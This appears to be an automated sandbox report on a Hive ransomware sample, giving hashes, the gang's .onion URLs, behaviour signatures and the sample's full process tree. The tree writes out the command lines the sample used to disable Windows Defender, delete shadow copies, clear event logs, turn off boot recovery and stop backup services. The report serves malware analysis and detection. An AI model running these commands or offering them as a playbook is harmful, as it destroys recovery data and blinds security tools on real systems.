Analysis
- max time kernel: 130s
- max time network: 130s
- platform: windows7_x64
- resource: win7-en-20211104
- submitted: 24-11-2021 14:30

Static task: static1
Behavioral task: behavioral1
- Sample: serenb.exe
- Resource: win7-en-20211104

General
- Target: serenb.exe
- Size: 3.4MB
- MD5: 177417be748814f6168171a42545f9dd
- SHA1: 9c8b988e66e0fe6f9dab69b1055e4ee200531094
- SHA256: 47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
- SHA512: c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
Malware Config
- Extracted from: C:\Djfk_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  - http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  - http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoCs)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes (pid, Process): 1628 MpCmdRun.exe
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoCs)
  Processes (description, ioc, Process): Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
- Clears Windows event logs (1 TTPs)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes (pid, Process): 484 bcdedit.exe; 2000 bcdedit.exe
- Modifies extensions of user files (12 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (description, ioc, Process):
  - File opened for modification C:\Users\Admin\Pictures\MountRemove.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_s4rpsVsGBco0.snwkz serenb.exe
  - File opened for modification C:\Users\Admin\Pictures\RemoveWrite.tiff.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Xr_RUA2buRE0.snwkz serenb.exe
  - File renamed C:\Users\Admin\Pictures\SearchTrace.raw => C:\Users\Admin\Pictures\SearchTrace.raw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_a6Z4lN5ROkM0.snwkz serenb.exe
  - File renamed C:\Users\Admin\Pictures\SendConvertTo.tif => C:\Users\Admin\Pictures\SendConvertTo.tif.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_tJi30oeqF840.snwkz serenb.exe
  - File opened for modification C:\Users\Admin\Pictures\SearchTrace.raw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_a6Z4lN5ROkM0.snwkz serenb.exe
  - File opened for modification C:\Users\Admin\Pictures\SendConvertTo.tif.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_tJi30oeqF840.snwkz serenb.exe
  - File renamed C:\Users\Admin\Pictures\MeasureLock.crw => C:\Users\Admin\Pictures\MeasureLock.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_fqNkIZYl1VM0.snwkz serenb.exe
  - File opened for modification C:\Users\Admin\Pictures\MeasureLock.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_fqNkIZYl1VM0.snwkz serenb.exe
  - File renamed C:\Users\Admin\Pictures\MountRemove.crw => C:\Users\Admin\Pictures\MountRemove.crw.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_s4rpsVsGBco0.snwkz serenb.exe
  - File renamed C:\Users\Admin\Pictures\RegisterSkip.png => C:\Users\Admin\Pictures\RegisterSkip.png.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_PWE7NiDdd600.snwkz serenb.exe
  - File opened for modification C:\Users\Admin\Pictures\RegisterSkip.png.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_PWE7NiDdd600.snwkz serenb.exe
  - File renamed C:\Users\Admin\Pictures\RemoveWrite.tiff => C:\Users\Admin\Pictures\RemoveWrite.tiff.2w5C61XeOz0IXwneN2bCFaNeg4AWg1zgWhKnM7Jia8z_Xr_RUA2buRE0.snwkz serenb.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory 64 IoCs
Processes:
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (pid, Process): 1060 vssadmin.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid, Process): 988 powershell.exe; 2124 powershell.exe; 1456 serenb.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, Process):
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes
Each entry is "image path | command line | PID"; indented entries are child processes of the entry above them.

- C:\Users\Admin\AppData\Local\Temp\serenb.exe | "C:\Users\Admin\AppData\Local\Temp\serenb.exe" | PID:1456
  - Modifies extensions of user files
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y | PID:620
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y | PID:560
  - C:\Windows\system32\net.exe | net.exe stop "SamSs" /y | PID:1492
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y | PID:924
  - C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y | PID:676
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y | PID:876
  - C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y | PID:280
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y | PID:484
  - C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y | PID:1304
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y | PID:1148
  - C:\Windows\system32\net.exe | net.exe stop "VSS" /y | PID:1700
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y | PID:1064
  - C:\Windows\system32\net.exe | net.exe stop "wbengine" /y | PID:1268
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y | PID:1680
  - C:\Windows\system32\net.exe | net.exe stop "WebClient" /y | PID:992
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y | PID:792
  - C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled | PID:956
  - C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled | PID:1752
  - C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled | PID:1012
  - C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled | PID:2004
  - C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled | PID:1000
  - C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled | PID:880
  - C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled | PID:940
  - C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled | PID:1328
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID:2016
  - C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID:1496
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID:1856
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID:1388
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID:432
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID:812
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID:1760
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID:1064
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID:1564
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID:1260
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID:1952
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID:1932
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID:1796
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f | PID:928
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:612
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:1332
  - C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID:1720
  - C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID:1116
  - C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID:848
  - C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | PID:752
  - C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | PID:1940
  - C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f | PID:1256
  - C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f | PID:1944
  - C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f | PID:1748
  - C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | PID:1392
  - C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | PID:944
  - C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | PID:1616
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f | PID:456
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | PID:1396
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | PID:1148
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | PID:1292
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | PID:1980
    - Modifies security service
  - C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID:756
  - C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet | PID:1060
    - Interacts with shadow copies
  - C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system | PID:1500
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security | PID:1244
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application | PID:852
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive | PID:1852
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete | PID:240
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | PID:484
    - Modifies boot configuration data using bcdedit
  - C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no | PID:2000
    - Modifies boot configuration data using bcdedit
  - C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All | PID:388
    - C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All | PID:1628
      - Deletes Windows Defender Definitions
  - C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true | PID:888
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true | PID:988
      - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true | PID:2104
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true | PID:2124
      - Suspicious behavior: EnumeratesProcesses

Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  - MD5: 77a51484f9ceae82d4fa6465a04bd928
  - SHA1: 65a6612df040610f5d58ef3b3efa35d8d7bb7bc1
  - SHA256: 19f9150c6ce2062757b5a69e0ea00d0d42ba09b1f14e87f1360cb41a196e3164
  - SHA512: ee433697b328b9052cb2baf838dbf04acc4c14528c3ede5150c837decb6d0787d8851ea2d0d5299e477c2fbdc5c3f0d71cc19dc1dd0ab34d3982e3edc2366f19